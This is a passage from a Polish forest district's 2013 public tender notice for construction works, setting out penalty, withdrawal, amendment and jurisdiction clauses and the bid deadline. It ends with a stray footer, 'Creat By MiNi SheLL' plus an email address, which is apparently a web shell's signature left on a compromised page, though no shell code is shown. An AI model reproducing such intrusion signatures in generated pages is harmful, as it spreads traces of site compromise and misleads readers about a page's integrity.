28 W razie stwierdzenia w toku czynności pdbioru lub w okresie rękojmi wad nienadających się do usunięcia, Zamawiajacy może żądać usunięcia wad, a w razie braku usunięcia w wyznaczonym terminie, w przypadku wad istotnych - odstąpić od umowy, zaś w przypadku pozostałych wad obniżyć wynagrodzenie Wykonawcy odpowiednio do utraconej wartości użytkowej lub technicznej obiektu
29 Zamawiajacy zastrzega sobie prawo do korystania z uprawnień z tytułu rękojmi niezależnie od uprawnień wynikajacyc z gwarancji
30 Stronu ustanawiają odpowiedzialność za niewykonanie lub nienależyte wykonanie  umowy w formie kar umownych w następującyc wypadkach i wysokościach
31 Wykonawca płaci Zamawiajacemu kary umowne
a/ za opóźnienie w wykonaniu przedmiotu umowy w wysokości 0,2% wynagrodzenia określonego w pkt 6, za każdy dzień opóźnienia liczony od terminu określonego w pkt 3
b/ za opóźnienie w usunięciu wad stwierdzonych przy odbiorze lub w okresie gwarancji, rękojmi za wady w wysokości 0,2% wynagrodzenia określonego w pkt. 6 zaka żdy dzień opóźnienia liczony od dnia wyznaczonego na usunięcie wad
c/ z tytułu odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy w wysokości 5% wynagodzenia określoneo w pkt 6
32 Zamawiajacy zastrzega sobie prawo do dochodzenia odszkodowania uzupełniającego do wysokości rzeczywiście poiesionej szkody
32.1 Wykonawca dokona zapłaty kary umownej ora odszkoowania w terminie 30 dni od daty otrzymania wezwania do zapłaty
32.2 Zamawiajacy zastrzega sobie prawo do potrącenia kar umownych z
32.2.1 naleznego wynagrodzenia naliczonego w fakturach wystawionych przez Wykonawcę
32.2.2 zabezpieczenia należytego wykonania umowy
32.3 Wykonawca wyraża zgodę na potrącenia kar umownych
33 Oprócz wypadków wymienionych w tytule XV Ksiegi III Kodeksu Cywilnego Zamawiajacemu przysługuje prawo odstapieniua od umowy w następujących przyapadkach:
33.1 w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, odstąpienie od umowy w tym wypadku może nastąpić w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach
33.2 przystąpienia od likwidacji lub rozwiązania Wykonawcy
33.3 wszczęcia przeciwko Wykonawcy postępowania egzekucyjnego
33.4 braku podjęcia przez Wykoanwcę robót na danym placu budowy w ciągu 14 dni od daty przekazanai placu budowy, mimo dodatkowego wezwania do podjęcia robót
33.5 wykonywania przez Wykonawcę robót niezgodnie z SIWZ, w tym Projektem budowlanym i Przedmiarem robót oraz sztuką budowlaną - o ile niezgodności te są istotne, po uprzedmim pisemnym wyznaczeniu przez Zamawiajacego terminu na usunięcia tych nieprawidłowości i jego bezskutecznym upływie
33.6  przerwania realizacji robót bez uzasadnienia, gdy przerwa ta trwa dłużej niż dwa tygodnie
33.7 opóźnień w realizacji przedmiotu umowy sięgających co najmniej 14 dni w stosunku do ustalonych terminów
34 Odstąpienie od umowy powinno nastąpić w formie pisemnej i powinno zawierać uzasadnienie
35 W wypadku odstąpienia od umowy Wykonawcę oraz Zamawiajacego obciążają następujące warunki szczegółowe:
35.1 w terminie 7 dni od daty odstąpienia od umowy, Wykonawca przy udziale Zamawiającego sporządzi szczegółowy protokół inwentaryzacji robót w toku, wg stanu na dzień odstąpienia
35.2 Wykonawca zabezpieczy przerwane roboty w zakresie obustronnie uzgodnionym na koszt tej strony, która odstąpiła od umowy
35.3 Wykonawca sporządzi wykaz tych materiałów, konstrukcji lub urządzeń, któr nie mogą być wykorzystane przez Wykonawcę do realizacji innych robót nieobjętych niniejszą umową, jeżeli odstąpienie od umowy nastąpiło z przyczyn niezależnych od niego
35.4 Wykonawca zgłosi do dokonania przez Zamawiajacego odbioru robót przerwanych oraz robót zabezpieczających, jeżeli odstąpienia nastąpiło z przyczyn, za które Wykonawca nie odpowiada, a Zamawiajacy dokona ich odbioru w ciągu 14 dni roboczych
35.5 Wykonawca niezwłocznie, a najpóźniej w terminie 7 dni usunie z tereny budowy urządzenia zaplecza przez niego dostarczone lub wzniesione
35.6 Zamawiajacy w razie odstąpienia od umowy z przyczyn, za które Wykonawca nie odpowiada obowiązany jest do:
a/ dokonania odbioru robót przerwanych-prac projektowych- oraz do zapłaty wynagrodzenia za roboty, które zostały wykonne do dnia odstąpienia
b/ odkupienia materiałów, konstrukcji lub urządzeń określonych w, pkt 35.3. których nie da się zagospodarować na innych placach budowy
c/ rozliczenia się z Wykonawcą z tytułu nierozliczonych w inny sposób kosztów budowy, obiektów zaplecza, urządzeń związanych z zagospodarowaniem i uzbrojeniem terenu budwy, chyba, że Wykonawca wyrazi zgodę na przejęcie tych obiektów i urządzeń
d/ przejęcia od Wykonawcy pod swój dozór terenu budowy z dniem odbioru robót
36 W sprawach nieuregulowanych w niniejszej Umowie stosuje się przepisy Kodeksu Cywilnego i ustawy pzp
37 Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem pkt 38
38 Dopuszczalne są następujące zmiany treści umowy:
38.1 zmiany zakresu zamówienia spowodowane zmianą dokumentacji technicznej, skorygowanej przez projektanta i zaakceptowanej przez Zamawiajacego
38.2 zmiana sposobu wykonania zamówienia, materiałów budowlanych sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie,
38.3 zmiana terminu realizacji przedmiotu zamównienia, w przypadku:
a/ działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie terminie,
b/ zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonanie prac budowlanych lub spłnienie wymogów technologicznych, udokumentowanych w dzienniku budowy
c/ błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie
d/ konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót, konieczność zmiany akresu robót i finansowania
e/ konieczności wykonania dodatkowych badań i ekspertyz, praz lub badań archeologicznych, wykopalisk, powodujących konieczność wstrzymania robót objętych niniejszą umową,
g/ rezlizacji w drodze odręnnej umowy prac powiązanych z przedmiotem niniejzej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, w tym udzielenie w trakcie realizacji umowy zamówień dodatkowych i/lub uzupełniających związanych z realziacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji -powodujących konieczność jego wydłużenia-
h/ wstrzymania realizacji robót przez uprawniony organ z powodu znalezienia niewybuchów i niewypałów
i/ jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy 
j/ wystąpienia odmiennych od zakładanych warunków geologicznych i terenowych
39 Zmiany umowy przewidziane w pkt. 38 dopuszczalne są na następujących warunkach:
1- ad pkt 1 - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego
2- ad pkt 2 - zmiana na materiały, urządzenia i sprzęt posiadające, co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty oraz zmiana sposobu wykonania zamówienia powodująca usprawnienie procesu budowy, zwiększeniem bezpieczeństwa na budowie pod warunkiem nie zwiększania ceny
3 - ad. pkt 3 - w zakresie niepowodującym zwiększenia wynagrodzenia Wykonawcy określonego w niniejszej umowie
- lit. a - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania
- lit. b - o czas trwania niesprzyjających warunków atmosferycznych, które uniemożliwiają wykonanie zamówienia
- lit. c,d,e,f,g,h,i,j, - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy, lub o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do wykonania dodatkowych ekspertyz, badań
40 Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu  do umowy pod rygorem nieważności
41 Właściwym dla rozpoznania sporów wynikłych na tle realizacji niniejszej umowy jest sąd właściwy dla siedziby Zamawiającego
42 Integralną część niniejszej umowy stanowią SIWZ i oferta przetargowa
43 Umowę sporządzono w trzech jednobrzmiących egzemplarzach, dwa egz. dla Zamawiającego oraz jeden egz. dla Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lubaczow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Lubaczów  z siedzibą w Lubaczowie, ul. Słowackiego 20,  37-600 Lubaczów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2013 godzina 10:00, miejsce: Nadleśnictwo Lubaczów  z siedzibą w Lubaczowie, ul. Słowackiego 20,  37-600 Lubaczów, pokój nr 1 /sekretariat/, otwarcie 10.05.2013 r. godz. 10:15 /świetlica/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com